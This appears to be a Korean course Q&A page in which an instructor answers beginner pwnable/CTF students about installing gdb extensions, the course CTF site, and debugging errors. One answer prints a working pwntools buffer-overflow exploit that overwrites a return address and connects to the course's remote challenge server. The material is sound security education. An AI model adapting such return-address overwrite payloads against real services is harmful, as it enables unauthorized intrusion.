juntheworld

안녕하세요 younji님 !! 우선 열심히 학습해 주심에 진심으로 감사드립니다. 원인은 기본 gdb를 사용하기 때문으로 보입니다.강의에서는 pwndbg라고 하는 gdb의 확장 버전을 사용하는데, 현재 제공해주신 스크린샷에는 기본 gdb를 사용하고 있는 것으로 보입니다. (왼쪽 스크린샷에 (gdb) 부분) 실제로 강의 내용을 차근차근 따라와 주셨음에도 불구하고, 최근 pwndbg 설치 과정에서 내부 라이브러리 버전 오류로 인해 설치가 잘 되지 않는 경우가 발견되어서, 아래 스크립트를 이용해 peda gdb를 설치하신 후 다시 디버깅을 진행해보시면, 아마 강의 내용과 같이 어셈블리 코드 내용이 보이게 될 것으로 보입니다.<pre><code class="language-bash">sudo apt update
sudo apt install gdb python3 python3-pip git

cd ~
git clone https://github.com/longld/peda.git
echo "source ~/peda/peda.py" >> ~/.gdbinit</code></pre><img src="https://cdn.inflearn.com/public/files/posts/29610ce8-c6a3-4afa-a7f6-5066e136a187/c8a6c0f1-10fa-49ea-9d20-12b34c38c151.png" media-type="img" alt="image.png" title="image.png" width="645" height="284">gdb 실행시 위와 같이 gdb-peda$를 확인할 수 있다면 잘 설치가 된 것입니다. 즐거운 학습 되시길 바랍니다. 감사합니다!

BP실행 관련 질문드립니다

안녕하세요 poolchamp님! CTF사이트 (<a target="_blank" rel="noopener noreferrer nofollow" href="https://hacktheworldctf.xyz/challenges#BasicBOF-2">https://hacktheworldctf.xyz/challenges#BasicBOF-2</a>) 에서 제공하는 .zip 파일은 문제파일입니다.&nbsp;말씀해주신 .py 파이썬 파일은 답안지 파일이라고 생각해주시면 됩니다. 아래와 같은 익스플로잇 코드를 .zip 파일에서 제공한 폴더에 basic_bof.py 라는 파이썬 파일(꼭 해당 이름일 필요는 없음) 을 생성한 후, 복사 봍여넣기해서 사용하시면 됩니다 ! &nbsp;<pre><code class="language-python">from pwn import *
context.log_level = 'debug'

p = process("./basic_bof")
p = remote("101.79.9.58", 10010)

# gdb.attach(p)
# pause()

# exploit here
get_flag_addr = 0x401296

payload = b'A'*0x30
payload += b'B'*0x8
payload += p64(get_flag_addr)

p.sendline(payload)
p.interactive()</code></pre>&nbsp;질문 내용을 통해 유추해보건데, 이미 강의의 끝부분인 14. 익스플로잇 코드작성 (StackBufferOverFlow를 이용한 RET Overwrite)을 수강해주고 계신 것으로 추측됩니다.&nbsp;아래에 첨부된 코드는 해당 강의 수업노트에서 확인하실 수 있으니, 참고해주시면 도움이 될 것 같습니다!<img src="https://cdn.inflearn.com/public/files/posts/1d1e1530-299b-430c-a40c-fb759c17a3b8/20a66f60-e269-4d87-b373-d59edd013056.png" media-type="img" alt="image.png" title="image.png" width="629" height="320">&nbsp;<img src="https://cdn.inflearn.com/public/files/posts/879576ce-d747-4dc9-8a6a-f9db81e89d01/13c68c57-2ab4-4a16-94a8-cb4028755ec1.png" media-type="img" alt="image.png" title="image.png" width="629" height="476"> 늘 열심히 공부해주셔서 감사합니다!

basic_bof.py가 없어요

안녕하세요 taetae님. 우선 알려주심에 정말 감사드립니다. https 인증서 만료로 사이트에 보안 접속이 불가능한 상황입니다. <a target="_blank" rel="noopener noreferrer nofollow" href="https://www.hacktheworldctf.xyz/">https://www.hacktheworldctf.xyz/</a> 사이트 접속 후에 고급 > https://www.hacktheworldctf.xyz/(안전하지않음)(으)로 이동버튼을 눌러 임시로 https가 아닌 http로 이동하실 수 있습니다.<img src="https://cdn.inflearn.com/public/files/posts/175ecfe0-cbb9-4b3b-8c4f-9de37d2c4fc8/ba3de6e1-2e36-4649-9932-fc04578afe3a.png" media-type="img" alt="image.png" title="image.png" width="352" height="296">강의 수강에 불편을 드려 진심으로 죄송합니다. 빠른 시일 내에 https 접속을 복구하겠습니다. 늘 열심히 공부해주셔서 감사합니다!

사이트가 안들어가져요

안녕하세요. 도메인 만료로 인해 사이트 접속이 불가능 했었습니다. 현재는 모든 문제가 고쳐져 아래 링크로 접속이 가능합니다. <a target="_blank" rel="noopener noreferrer nofollow" href="https://hacktheworldctf.xyz/">https://hacktheworldctf.xyz/</a> 강의 수강에 불편을 드려 진심으로 죄송하다는 말씀드리고 싶습니다. 늘 열심히 수강해주셔서 감사합니다!

hacktheworld 사이트가 들어가지지 않습니다

안녕하세요 우선 열심히 강의 수강해주시고 질문 남겨주셔서 감사합니다!!&nbsp;AI 의 답변처럼 우분투 환경에서 비밀번호 입력할때 입력 값이 보이지 않습니다!! 한번 다 입력 후 엔터를 입력해봐주세요.&nbsp;문제가 해결되지않는다면 또 질문 남겨주시면 감사하겠습니다! 감사합니다

sudo password 에 입력이 안돼요

안녕하세요! sw020409님 우선 오늘도 열심히 학습해주심에 감사의 말씀 먼저드립니다. :)위의 문제는 리눅스의 동적 디버기인 gdb는 올바르게 설치되었으나, 좀 더 다양한 기능을 추가해서 제공해주는 pwndbg가 설치되지않아 발생하는 문제로 보입니다.아래의 스크립트를 입력하여 해결할 수 있을 것으로 보이는데, 추가적으로 문제가 발생한다면 언제든지 다시 질문 남겨주시면 감사하겠습니다!&nbsp;pwndbg등 다양한 pwnable 문제풀이용 도구설치는 아래 링크를 함께 참고해주세요:)좋은 질문 남겨주셔서 감사합니다. 즐거운 학습되세요!<a target="_blank" rel="noopener noreferrer nofollow" href="https://juntheworld.postype.com/post/13437080">https://juntheworld.postype.com/post/13437080</a><pre class="hljs"><code>#pwndbg
sudo apt install -y git
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh</code></pre>

gdb 실행이 제대로 되었는지 모르겠어요...

안녕하세요 현준님! 우선 좋은 질문 남겨주심에 감사드립니다. 먼저 코드를 보면 코드상에 문제가 보이지는 않습니다. 다만 p = process("./basic_bof") 부분에서 오류가 난것으로 보아 파일을 저장할때 설정한 이름이 코드상에 정의된 이름과 달라서 네임 오류가 난 것으로 보입니다! process(" ~ ") 함수는 현재 디렉터리를 기준으로 해당 이름을 가진 파일을 읽어오기때문에 경로상의 파일이름이 적절히 설정되었는지 확인해주시면 감사하겠습니다! 현재 보여주신 캡처본상에서는 문제가 없어 보이지만, 파이썬 인터프리터의 실행위치에 따라 경로가 변경될 수 있으니 참고해주시기 바랍니다. 또한 python3 (인터프리터 실행) 이후에 basic_<a target="_blank" rel="noopener noreferrer nofollow" href="http://bof.py">bof.py</a> 를 실행하는 것이 아니라 python3 basic_<a target="_blank" rel="noopener noreferrer nofollow" href="http://bof.py">bof.py</a> 와 같은 방식으로 실행했을때도 오류가 발생하는지 확인해주시면 감사하겠습니다!! 오늘도 열심히 공부해주심에 감사드립니다. 즐거운하루 보내세요!

네임에러

안녕하세요 이기찬님! 우선 좋은질문 남겨주셔서 감사합니다 :)gdb.attach(p) 명령어는 현재 내 machine (local 환경) 에서 작동되고 있는 프로세스에 gdb 디버거를 붙이는 명령어로, local 환경이 아닌 remote환경 (인터넷에 있는 프로그램.. ex. 101.79.9.58:10010) 에 gdb.attach()를 시도할 경우 프로그램을 찾지 못해 오류가 발생합니다.이에 리모트 프로세스에 익스플로잇을 시도할때는gdb.attach(p) 문장을 제거하거나 주석처리한 뒤 다시 시도해보시길 바랍니다. 오늘도 즐거운 학습되시길 바랍니다! 감사합니다.

remote 연결 질문드립니다!

안녕하세요! 열심히 학습해주시고, 좋은 질문 남겨주심에 감사드립니다. 우선 현재 보여주신 캡처본 만으로는 확실히 어떤 문제인지 파악하기가 쉽지않은데, gdb.attach(p) 명령어는 로컬 프로세스에 디버거를 붙이는 명령어로 pwntools 익스플로잇 코드를 실행하는 위치와 실행하는 프로세스의 위치가 다른 경우 실행이 되지않습니다. 혹시 remote 프로세스를 실행한 후 gdb를 붙이도록 익스플로잇 코드를 작성하시지 않으셨을지 확인부탁드립니다! 감사합니다.

python exploit code 실행 오류

Host 에서 VM으로의 복사 붙여넣기가 어려우신 것 맞을까요? 사용하고계시는 Virtual Machine 도구(virtual box / vmware .. 등등)에 따라 해결법이 달라서, 아래와 같은 키워드로 구글링 해보심을 추천드립니다. - VMware/Virtual Machine 가상머신 파일 옮기기 - 가상머신 드래그 앤 드롭 - 가상머신 복사 붙여넣기 혹시 VMware를 사용하고 계시다면 아래 링크도 도움이 될 것 같습니다! <a target="_blank" rel="noopener noreferrer nofollow" href="https://hintbox.tistory.com/entry/VMware-%EA%B0%80%EC%83%81-%EB%A8%B8%EC%8B%A0-%ED%8C%8C%EC%9D%BC-%EC%98%AE%EA%B8%B0%EA%B8%B0">https://hintbox.tistory.com/entry/VMware-%EA%B0%80%EC%83%81-%EB%A8%B8%EC%8B%A0-%ED%8C%8C%EC%9D%BC-%EC%98%AE%EA%B8%B0%EA%B8%B0</a>

juntheworld

Posts